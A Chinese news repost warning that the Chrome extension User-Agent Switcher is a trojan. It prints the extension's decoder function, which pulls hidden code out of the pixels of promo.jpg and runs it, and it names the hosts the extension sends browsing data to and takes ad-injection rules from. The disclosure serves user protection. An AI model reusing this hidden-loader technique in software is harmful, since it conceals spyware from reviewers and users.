当前位置:首页 > 短网址资讯 > 正文内容

大家一定注意了 Chrome 的插件 User-Agent Switcher 是个木马!

www.ft12.com8年前 (2017-09-10)短网址资讯3983
hrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {            if ("" === '../promo.jpg') return "";            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];            if (c.data.every(function(t) {                    return 0 === t
                })) return "";
            var m, s;            if (1 === o)                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 


扫描二维码推送至手机访问。

版权声明:本文由短链接发布,如需转载请注明出处。

本文链接:https://www.ft12.com/article_469.html

分享给朋友:

相关文章

你才喜欢郭敬明呢,你全家都喜欢郭敬明

在我们哪所十八线乡村野鸡高中,喜欢郭敬明是一件特别酷的事情呢吃过没文化的亏,高中读郭敬明的书,喜欢到想哭,尤其是《小时代》,唐宛如那句“让我受到了惊吓”是高中生活特别好的调味剂,适合跟朋友各种逗乐的语境。后来也试着再翻翻看,毕竟当初觉得幽默...

因央行监管严,微店或将不能用微信支付了

因央行监管严,微店或将不能用微信支付了

【FT12短网址】2017年6月15日上午,不少网友反应在口袋购物旗下微店(下简称“微店”)内已无法运用微信付出进行付款。亿邦动力网测验在微店内下单采购时发现,在挑选付款方法的页面,微信付出现已处于灰色不行选中情况,下面的赤色提示文字显现“...

FT12短网址:如何挖掘Nginx日志中隐藏的金矿?

FT12短网址:如何挖掘Nginx日志中隐藏的金矿?

作者|张晓庆 编辑|小智 对很多开发运维人员来说,Nginx 日志文件在被删除前可能都不会看上一眼。但实际上,Nginx 隐藏了相当丰富的信息,或许其中便蕴含着未知的金矿等你挖掘! 写在前面...

麦当劳惊曝丑闻刷爆全球!你一定没想到,我们吃的冰淇淋竟然.......

麦当劳惊曝丑闻刷爆全球!你一定没想到,我们吃的冰淇淋竟然.......

近几年,麦当劳和肯德基的食品丑闻,和他们总是毗邻相开的店面一样,此起彼伏,接二连三。而最近,麦当劳又摊上事儿了……具体什么事呢?故事还要从一位,在麦当劳打工的小哥说起……他叫Nick,18岁的他在麦当劳,路易斯安那州拉普拉斯店,找了一份后厨...

最新“亚洲品牌500强”:中日韩入选最多

【FT12短网址】9月28日电 业界最新发布的2017年“亚洲品牌500强”显示,中国、日本和韩国成为入榜品牌数量最多的国家。日本丰田、索尼和中国国家电网名列此次榜单前三名,前十名中另外七个品牌依次是三星、工商银行、海尔、华为、中国人寿、腾...

一位宁波父亲写给考上北大儿子的信,有网友“看哭了!”

一位宁波父亲写给考上北大儿子的信,有网友“看哭了!”

一位宁波父亲写给考上北大儿子的信刷爆朋友圈,或许这是他一路优秀的秘诀……文|宁波晚报记者 梅子满  这两天,一封宁波父亲写给即将上北大儿子的信在微信朋友圈里传疯了!  这封言语朴实平淡的家书,感动了无数网友,有网友直呼:“看哭了!”  在这...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。